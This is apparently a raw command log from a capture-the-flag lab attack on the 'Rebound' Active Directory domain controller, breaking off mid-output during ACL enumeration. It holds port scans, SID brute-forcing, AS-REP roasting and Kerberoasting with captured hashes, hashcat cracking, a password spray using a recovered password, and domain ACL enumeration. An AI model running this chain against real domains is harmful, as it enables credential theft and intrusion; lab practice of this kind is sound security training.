nmap -p- --min-rate 1000 10.10.11.231

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 18:59 CST
Nmap scan report for 10.10.11.231
Host is up (0.41s latency).
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49686/tcp open  unknown
49687/tcp open  unknown
49688/tcp open  unknown
49701/tcp open  unknown
49716/tcp open  unknown
49737/tcp open  unknown
49785/tcp open  unknown

53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49701,49716,49737,49785,

nmap -sSCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49701,49716,49737,49785 10.10.11.231
Nmap scan report for 10.10.11.231
Host is up (0.41s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-03 17:51:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after:  2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m03s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after:  2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m04s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after:  2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m03s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after:  2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m04s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49701/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49737/tcp open  msrpc         Microsoft Windows RPC
49785/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h41m03s, deviation: 0s, median: 6h41m03s
| smb2-time:
|   date: 2025-04-03T17:53:03
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.06 seconds

echo "10.10.11.231 dc01.rebound.htb rebound.htb" | tee -a /etc/hosts
systemctl restart networking

smbclient -L \\\\10.10.11.231\\

lookupsid.py nan@10.10.11.231 10000 -no-pass
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.10.11.231
[*] StringBinding ncacn_np:10.10.11.231[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)

lookupsid.py nan@10.10.11.231 10000 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > usernames.txt

Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$

GetNPUsers.py -dc-ip 10.10.11.231 rebound.htb/ -usersfile usernames.txt

$krb5asrep$23$jjones@REBOUND.HTB:0bc201fbc7633d7659a692dbdae5417a$2f61224306482f9b27d7ac0e23e076dee4f2908a54024b6c3c76b561cc6f632ca552fa95855600f435435a0b08f6f8232e2c1107098cbce70d82b4b6b30696458877029be8ff9d684718eff61f45472167592ac5d547cce364b2e6df0a9ef7d6692bd530e11604435d07302ec16ad9b2e5ba27ceb6d30010c8427b78b1b9efd8c846bd22b67cec266bc526210b4a798b53dfe152cec531ad95215de982f345212c4eb902195e774599c56295d7f699bd446e70178b3bc087f366ea0f5e3afc709f4d79440d1d5e7bc8ce5a60d42835e566b70ca939bbb1d2e076d52915f9ca184a0811ffb14f11125213

hashcat -m 18200 '$krb5asrep$23$jjones@REBOUND.HTB:0bc201fbc7633d7659a692dbdae5417a$2f61224306482f9b27d7ac0e23e076dee4f2908a54024b6c3c76b561cc6f632ca552fa95855600f435435a0b08f6f8232e2c1107098cbce70d82b4b6b30696458877029be8ff9d684718eff61f45472167592ac5d547cce364b2e6df0a9ef7d6692bd530e11604435d07302ec16ad9b2e5ba27ceb6d30010c8427b78b1b9efd8c846bd22b67cec266bc526210b4a798b53dfe152cec531ad95215de982f345212c4eb902195e774599c56295d7f699bd446e70178b3bc087f366ea0f5e3afc709f4d79440d1d5e7bc8ce5a60d42835e566b70ca939bbb1d2e076d52915f9ca184a0811ffb14f11125213' /usr/share/wordlists/rockyou.txt

GetUserSPNs.py -no-preauth jjones -request -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$eb6327d4e7a899a4c90a7fe9$5ba2eeba25ffb118c6a8ef1351e16adf2a9024690ee10bcc0690c573feb4282076ffe8b6049e3ce8baca1ebd012364e753013674b16186d693d0d888e1ee1d3078b6bf309b08f5ff68c28d7847496876aa0ee847e9c45ab01f8405dd7239ecc36ec5113f7bc22b9f3458ca864310ea787060d5664aa7f228e6c63cbe5059b6030dc942d7ddbd82f460823adb57a5b72e9a4690aebee1ed1821f18f24eb6227e56e11eed6431eed605fa5ed7b8170319f46b40357476456cdd7551245b3bb416af5e9f2ae1a8cd4f14d5a8b3cb4a3769ea897eef0e88b17c0b44d3de16e057a6fcda63aa0a7642578523c448d0d87bcc313d16c71ea8ffd952e6e16ce4c135450c4453b9bf523d1dac0f13a86c452a98a4f145ee6939d9b1da0d11e4eb8116a4403a469a7a8865fd24e03049072a0cb276e591a9c9edbeee818919d56228ef01c4b44b06c8385b56de2ea48d4d8457f9cea5056fe0936e8e354aa7391fbcc45d6dfcc349c354e0a3e6cf8ca79e145066c423d3c4f15fa6981e2edd81ee8ec1eea7bee971f0a607c98f61c6c59df0a3774d2a3502b556008041e6bdae80e6e14f246b1a7b4d10dcf5a8b3c88e77766fc6515afa75bad6b1704f6fdfcddf2f2c6c3c9e430a112347027d0332835c1fb2ee74b64fe8793c71705548a1ec62b4f31b6cc91a1786de64a61416c266e7d520ac04d3bbeb14b14e31f8e584226a1e50a5f5fedc276acde68c6f34c108698c0cd0dd2f93691a4d1d00f1274be471728f9b731acafbb9e583915dbca59fbc33749e3dcbc6c32dcdd058fb72031480f92f0f5fe29f34860a076c0c3f1a76bf8963287bac02e6c79bbf9ae095d621432596784ddd24671c951b7df843d9a453181b2368fe48e93f04bfe88da4ba5b31b5a910a6869891c835df4cd33cc19b87d59d385bfd9feb9a63658eb7e1631448a7c96e5116ad202507198f821409983b15598a6f41b95d86208c72ff9476954140756b8efb8a0558bb6f10069180698005df87b53cec06f77f03e863fb57f7fc978c93838129ba48a9657a5a125287ce3e648e440b7ca9dd3904952ec17d494d1bdf303b99da31e8a2fb28535d9e8320cecf51eaeabe4694e5afdb86868a7d7db6cf091cb27b1fe88527a2788a3cc4e35890808640e0344859e2053f0b2214f600616edfe4028e9681084f639bf9b2e72c5f42143fb4e408f8fbf7f006c43b1da4a89a567cf77e7315803ee456c308b5ecc443956deae5da50896445e6d481ee1f03767b85938c9ab5b65070e6e1507cce38f47d15ab68b2f9883f12d1a50382af5d9cc68297a0f7712549e00a2efd8be91aa3cb422105d829f3b067e1e01cb702d192f548d5409f2be163220e584bb2ec4fefe233984286082cd18582141ed02533a981d133f4569106cd15d46b94cfbee0d897e5b2699117e897080db77e125f4d2375402db4be637e8532ec0b196a820c3819212
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$7cbd9dd749a5126aee376eb6$0a66b2e0fd2c18b86e4d552478a1edbef924443479771865195925f9d0b1dd89ff567b15da0972f240d25c39822083bd7270a49379271b098ae24b34587507b9559d05a896aee52e207bc734606eb29ee1f7a050e43cb1cc2226d6dc550ac654bdb2b6f98d694ac38dbc5c2e3692e7f0e9ee69a06002d54973ca64e17f338827873dcd1bfe8a7adfa31a7352951d912491e88ac80bf789b990e03c26e08b934986218cfa103d440ce2fe808a81801a44636e522d222c607959a8c4d64995b08806cc0cfd390e802328150d409776fe8ab8cb5072d1226f680253b62dbd18b53a13b434e425286ba8e980c896edc7f3c51ac82b3f817ec8d66807e58d01e60fda0abfa196de7968bce30dcf011c0866b30c9940b7dc0bbda6cfd2327bfd7e42d1f5c6cc575ed864ede4b9a2c5033417af007c7530fec84b4fc1bd1c1c857a896b82a5c25588b9f99eba3e1365054220e35f23ddfc527b703569a7a4cba34c4a244800ac51945601747d2c022e0e5108ea63aa1bb047944bbd859eaacbf858928fdbb7bb8fe259cee72aa8fe4e991d3a7791c0a35b2e57c90e4824180bc6571c89e688be228c231a16b0f57ef4e7ca7d0f6149440ae4b2d84ea2a7328759dd86d69608e17d7158fd6ea0cce3777c0c73c093ba806bd24aef888688c49c3cbd3165a9af111bdcef55f3a70beff9a500fcb45b49119646f58de7c8dad3f744d7db7bbc704e4812b53893d71009903b43f60cfc953fc3a63acd41fdffe91835ff98941c0923f10bb138eb305b3eff348cf9ba1cba1a2b21e1c09f920d936870a793097a3a0909dd0bcdf8e0e6a1fae45651e9daa8da76af4815dc329ee04c89fa6f36c84c8e3dbfcebee5559012c198938fe0eb4d274b8e8be1022aeaaea78d81b9bfa62c0bd05aeae5eb59ad21e957b50206d94457c046429c6b72530b5159c1444a1baf1e7ee06a4d5fd3eed6502ac7004afe46fb3aa22c931aaeeecbfaefa5bd96a32697c6d22d44869b05d93c8fa9bab9c0484d2cbff028dc447acd825d16797df653f1b755cb490cf91591d77a94bbc59799f46411590bf9a7e5a09eaa166a3248ededdc1fe77548d70af20e2d50a89ff6a1265e0decc80336aebaeefafcd3c01579a84f56a9dc654389faeebbbb7cb931d48bfa16c4563105f37ba1c2bb8d37213d19e68b4436b28298d53d2962cc1d877e710a87d65395719efa198a679f03f7faa2ed232e66501bd6a6056aa2509283653b2a3825b1234bec71aef76c27a0865e4651b962c0b834ea628b5d87f65c5b2832cfa6d7aa9b80469331f4688d038afd5760bbc9814e5ae9322e5f626d784c6b956c2e54faa24ad3fde68ef80c6ce0e0ffd16d0de436e096
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$218629c8ade25b5e45b47d69218b6c7b$6dfdb27d7c619095e8a2c948625fde3c3d80b9768ca21d807b3d5375a083e4f6c24330ab74a9044a101133525483ef5cb10fc4f56d245ad52202d16810e842a1be30597a5cd75c28f62199d7af91803520c21b6c95f56deb494ee49bcc14b0ca1dac726d3cddf4c2935fd2384c68871600d76630de96a7469e23e7d01922277b93d1151831f603c735411ea2e5b4f6ff8bf3e151d702249dc127a8d468df858efe85858eb17f9e6b282bdd996b8303781de31186d02a60bee226964145f40c380dabb8fb5fb8098b77cc329c0cb874fcbbd00496e4738cba33a246e88c4c54991994eb98f3164f7520729b7863c88a6693f7dce112d4952cf30c2c24c2e7bc1ad309778da359b6e2d69580f85eb5b4648397945943d430c73a34aa16b407aec2d8a4ab5c708c2b9cab6e2ff2d72659965da35990f7e0390c6de9114c5952ff101820e7abdc4b708cbc2c795b1776ccd4757285e81fdc2f1c365037f9de13171b0596ed379de49c667a1add1946fe9110773fb88cb6fd020ea3a7d70c9c99f1bd54e4e66e6253ef9c62ce7352ca8ec3b23500ea70f90a53eebe768592a06f7845b1372f68d405de962f47b579a556c84a46b003f4451d064579b5e27be52db822dc2381a544129585a94c1f521fd909da98160739f37f2aa3aa7a3ea878e5d1b21b82813a92e50f064c7c24b79f275e536a5ee83369e6125fc66dd6fd32c386eb5796e684eda003da9e95d152ba23529360416af18df6226c8de986b8fe44e23b0d5c096fb16707d45091fde21bbd582aa8eb92e4057d5f69d19e884a62b0221a1b2aca8515a1166859067ffd3fb4830fadc10050aca85598d94a7aebd7d8dd7ca9b9585f213913113ece75c9018cff109addd63eb85d05f040737169413c1baec73d01b1279d7ab687cf1c441a7187e3a8f39ab44ef05d57dda249acfe962158dcf2ec229ab2df0673de849114a4db0e82221944de1ca4404a596f45175e39776160a587079026ae0fe97a16bac2704da10184fe864e2235d0b8bd4fa17a9dfe6dd083a2e074210e432a852c6d3354becab048880f62f72daa9c111ddef01567189346ea34b564f5564ddb405bc2d46293b5a47f0ffcf7efc6ee33a65bcf77dcf54007f8b7fe05c3a675c0063211c326185f8e07f8a78bb9f6678d4a0c118ca5ef87d36a8efeea06adc75ca89ede3cd169e0f00d4e0628d6f9f86f300a14579e33a4d42c15e6af2a9553372ac4888902a6aa7be1bf95d45f6d61dade0a26cc2b56084367fff4c2e4a2c1985044f8ff685509064c2c1ee5af2887866bcda404ff70f8aadb15ee73b36e9887989afeeb92ab50c54df56784768aed3dfb9e4cab1bf5c5
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$2322878b42915089e6dd828c$22b3a2c65a9b2ca43bbaab2847a752a50bfb29e172ca7e3cb7b0b6d407e91be63f5bbfed1f96b2b1f0992c09abc57dc43d8086394f628634df5a5a37652c3619b4168605d5b27d19e0f03f0769dcc9240cd2e541f3b9fbcc62fd26a3f5bb001c7c62ad4f7bb85fc9fbcd65c1edf28891fb3a8e5718248cd471498bc2a4fb15d58bee550484afc8a10da6df5a1ae627996442af00ea1d22bed1d83266f224df4e799eadbdca4ba3ac39cfe595de1ab36fd9c24c64624608900a48bf3a0ce4d5ee126ccf628ceba25e8fc46560dc801e3045baf92fdfa2b36f4011293f6e696f43dc53f9111e39b474ec8c7e3dbb0afc712898f8b5746d2cdc3b4724c3c3b0c199e60fad1b2a374036f2b78c97fdfd0dc14b9819667f4fab23c665b609a35340b121067c6059887639ca2bc641ffe845ca2d8804509018a04973c056c67ee70bf9ae5ec4419057f6aec667381206a5a33dc88c9b11eaba181c139190089a8fb00cdaa16b8a2390671f7b9d44b6ce0f79525ec0e852cd7a966e8818b1fb9ab38c005d6aecc81e14be4c66c0a3a93c167a2ad197e02f250d0d515473c85326753fdc3862c80cc9cbf054060ee19f2383fec08d4d0fce914b986962f343f336e390567aadb18077873365053d977eefdcc97ed15bc29ef6ce106bf22687eee2f2d787c72e24a9f7e44b062a4eae3703b696fbc356d56a377f1a674d6e3e482c66dfb61dcf2753267c39d014d6c00205806cfe7292351c7e03248286bfe761bc92806435e79944a6c54cff940232e97dd97ccde89fda516edfcddd47e468b2cad62558901555ea1c25b97a6b7595ed9448747338448626964e9a1e3b1d45536cbe74a22ceb6571a5d5c7f5f935d141d54a2501837d42d370d18396348f444a036077d381a485a63c9ae904aff734dabe19ee763d8f33e2b3bfd39fc4c585315d6857c93a6772566571fde3e9c2e3740c928f831cba0bdc50f9f2ee2025667fb6f0a622556e696167cfe9de69e8873014808d1c4c71fa2576b0ad05dfdce04156a1dbc692e7eec464589a414eeb978a75ff9f5b3e4d0e7878e331e741c8f2130d5adbf20af4e4dc76d6b2960f89c78345f4560a3fb22fc8ad6667848e7531d72a58ad39935bf8730df771c08620d9a1956d933c1e1f662c5f5e050d33809e45c18a42e5dca20b8d4b5bb7154a6eeee53ce03c5b72dfeb98d518dc360c91643abd4b06f439d245cade99f6928733f232b8f32bf5bb3cd1af16577afe4e00dfd3f90da0004cc04b3b707aa6b3e175a8dd7352ed4ac4f86eca17b5cca3efa687181492410b60558cd5117ea42132796a1c769e1c9fb71fdebce6009cd6626c7330738cfd9e03b0f48d4a75c4bfbc3a

hashcat -m 19700 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 '$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$218629c8ade25b5e45b47d69218b6c7b$6dfdb27d7c619095e8a2c948625fde3c3d80b9768ca21d807b3d5375a083e4f6c24330ab74a9044a101133525483ef5cb10fc4f56d245ad52202d16810e842a1be30597a5cd75c28f62199d7af91803520c21b6c95f56deb494ee49bcc14b0ca1dac726d3cddf4c2935fd2384c68871600d76630de96a7469e23e7d01922277b93d1151831f603c735411ea2e5b4f6ff8bf3e151d702249dc127a8d468df858efe85858eb17f9e6b282bdd996b8303781de31186d02a60bee226964145f40c380dabb8fb5fb8098b77cc329c0cb874fcbbd00496e4738cba33a246e88c4c54991994eb98f3164f7520729b7863c88a6693f7dce112d4952cf30c2c24c2e7bc1ad309778da359b6e2d69580f85eb5b4648397945943d430c73a34aa16b407aec2d8a4ab5c708c2b9cab6e2ff2d72659965da35990f7e0390c6de9114c5952ff101820e7abdc4b708cbc2c795b1776ccd4757285e81fdc2f1c365037f9de13171b0596ed379de49c667a1add1946fe9110773fb88cb6fd020ea3a7d70c9c99f1bd54e4e66e6253ef9c62ce7352ca8ec3b23500ea70f90a53eebe768592a06f7845b1372f68d405de962f47b579a556c84a46b003f4451d064579b5e27be52db822dc2381a544129585a94c1f521fd909da98160739f37f2aa3aa7a3ea878e5d1b21b82813a92e50f064c7c24b79f275e536a5ee83369e6125fc66dd6fd32c386eb5796e684eda003da9e95d152ba23529360416af18df6226c8de986b8fe44e23b0d5c096fb16707d45091fde21bbd582aa8eb92e4057d5f69d19e884a62b0221a1b2aca8515a1166859067ffd3fb4830fadc10050aca85598d94a7aebd7d8dd7ca9b9585f213913113ece75c9018cff109addd63eb85d05f040737169413c1baec73d01b1279d7ab687cf1c441a7187e3a8f39ab44ef05d57dda249acfe962158dcf2ec229ab2df0673de849114a4db0e82221944de1ca4404a596f45175e39776160a587079026ae0fe97a16bac2704da10184fe864e2235d0b8bd4fa17a9dfe6dd083a2e074210e432a852c6d3354becab048880f62f72daa9c111ddef01567189346ea34b564f5564ddb405bc2d46293b5a47f0ffcf7efc6ee33a65bcf77dcf54007f8b7fe05c3a675c0063211c326185f8e07f8a78bb9f6678d4a0c118ca5ef87d36a8efeea06adc75ca89ede3cd169e0f00d4e0628d6f9f86f300a14579e33a4d42c15e6af2a9553372ac4888902a6aa7be1bf95d45f6d61dade0a26cc2b56084367fff4c2e4a2c1985044f8ff685509064c2c1ee5af2887866bcda404ff70f8aadb15ee73b36e9887989afeeb92ab50c54df56784768aed3dfb9e4cab1bf5c5' /usr/share/wordlists/rockyou.txt

nxc smb rebound.htb -u usernames.txt -p '1GR8t@$$4u' -d rebound.htb --continue-on-success

powerview rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231

Get-DomainUser -identity ldap_monitor
cn                                : ldap_monitor
distinguishedName                 : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
name                              : ldap_monitor
objectGUID                        : {cf7691bd-5b32-407d-9d42-262013f10288}
userAccountControl                : NORMAL_ACCOUNT [66048]
                                    DONT_EXPIRE_PASSWORD
badPwdCount                       : 0
badPasswordTime                   : 08/04/2023 15:46:25 (1 year, 11 months ago)
lastLogoff                        : 1601-01-01 00:00:00+00:00
lastLogon                         : 08/04/2023 16:23:35 (1 year, 11 months ago)
pwdLastSet                        : 08/04/2023 09:07:56 (1 year, 11 months ago)
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-7681
sAMAccountName                    : ldap_monitor
sAMAccountType                    : SAM_USER_OBJECT
servicePrincipalName              : ldapmonitor/dc01.rebound.htb
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb


Get-DomainUser -identity oorend
cn                                : oorend
distinguishedName                 : CN=oorend,CN=Users,DC=rebound,DC=htb
name                              : oorend
objectGUID                        : {edb118e8-3995-45d9-89f1-bf978e4e7fa4}
userAccountControl                : NORMAL_ACCOUNT [66048]
                                    DONT_EXPIRE_PASSWORD
badPwdCount                       : 0
badPasswordTime                   : 09/04/2023 09:54:33 (1 year, 11 months ago)
lastLogoff                        : 1601-01-01 00:00:00+00:00
lastLogon                         : 04/04/2025 10:53:25 (today)
pwdLastSet                        : 08/04/2023 09:07:56 (1 year, 11 months ago)
primaryGroupID                    : 513
objectSid                         : S-1-5-21-4078382237-1492182817-2568127209-7682
sAMAccountName                    : oorend
sAMAccountType                    : SAM_USER_OBJECT
objectCategory                    : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb

PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7681
[2025-04-04 14:10:03] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2025-04-04 14:09:41] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Self
AccessMask                  : Self
InheritanceType             : None
SecurityIdentifier          : REBOUND\oorend

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainOU
objectClass               : top
                            organizationalUnit
ou                        : Service Users
distinguishedName         : OU=Service Users,DC=rebound,DC=htb
instanceType              : 4
whenCreated               : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged               : 04/04/2025 12:58:02 (today)
uSNCreated                : 69325
uSNChanged                : 185281
name                      : Service Users
objectGUID                : {fc826af9-06f9-47e7-866e-4c3c015638b8}
objectCategory            : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData     : 04/04/2025
                            04/04/2025
                            04/04/2025
                            04/04/2025
                            01/01/1601

objectClass               : top
                            organizationalUnit
ou                        : Domain Controllers
distinguishedName         : OU=Domain Controllers,DC=rebound,DC=htb
instanceType              : 4
whenCreated               : 07/04/2023 14:01:41 (1 year, 11 months ago)
whenChanged               : 07/04/2023 14:01:41 (1 year, 11 months ago)
uSNCreated                : 5804
uSNChanged                : 5804
name                      : Domain Controllers
objectGUID                : {80923a93-fed7-4fe0-b3c7-980864dc3f78}
objectCategory            : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
gPLink                    : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=rebound,DC=htb;0]
dSCorePropagationData     : 04/08/2023
                            04/07/2023
                            01/01/1601

Get-DomainObjectAcl -Identity "OU=Domain Controllers,DC=rebound,DC=htb"
ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Read
AccessMask                  : Read
InheritanceType             : None
SecurityIdentifier          : Authenticated Users

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : ReadAndExecute
AccessMask                  : ReadAndExecute
InheritanceType             : None
SecurityIdentifier          : REBOUND\Domain Admins

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : FullControl
InheritanceType             : None
SecurityIdentifier          : Local System

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Read
AccessMask                  : Read
InheritanceType             : None
SecurityIdentifier          : Enterprise Domain Controllers

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
ObjectAceFlags              : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
ObjectAceType               : User-Account-Restrictions
InheritanceType             : inetOrgPerson
SecurityIdentifier          : BUILTIN\Pre-Windows 2000 Compatible Access

ObjectDN                    : OU=Domain Controllers,DC=rebound,DC=htb
ObjectSID                   : []
ACEType                     : ACCESS_ALLOWED_OBJECT_ACE
ACEFlags                    : CONTAINER_INHERIT_ACE, INHERIT_ONLY_ACE, INHERITED_ACE
AccessMask                  : ReadProperty
